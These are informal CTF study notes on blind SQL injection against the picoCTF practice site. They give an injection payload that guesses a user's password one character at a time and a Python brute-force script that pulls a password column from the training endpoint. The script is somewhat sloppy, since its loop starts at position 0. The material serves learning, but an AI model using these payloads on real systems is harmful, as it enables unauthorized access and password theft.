Blind SQL Injection

this is when u can trick the application into returning stuff, but it doesn't actually show you the records

Solutions

Guessing 1 character at a time :/
if the application does tell u if it exists or not, you can guess a letter of the string at a time
' or username='picoctf' and (select substr(password, 1, 1))='a
- targets the user picoctf and tries to find their password
- the select substr is to check if the first letter is 'a'
- this can be very slow manually, so we can use python requests to brute force it
Brute force:
- 'Printable' is just a string with all the printable ASCII characters, and we iterate over them.
- 'Binary' in mysql context, is just a way to specify the we want to make case sensitive comparisons. If we do not use it, we would not be able to identify if a character is lowercase or uppercase.

import requests
from string import printable

accum = ""
for i in range(40):
  for letter in printable:
    accum += letter

    r = requests.post("https://primer.picoctf.org/vuln/web/blindsql.php?&username=WeDontCare&password=' or '"
    + letter +"'=( select substr(binary password,"+str(i)+",1) from pico_blind_injection where id=1 ) and ''= '")

    if 'NOTHING FOUND...' in r.text:
      accum = accum[:-1]
      print("nope")
    else:
      print(f"We found the character: {letter}")

print(accum)

PreviousMethods NextSQL Injection

Last updated 2 years ago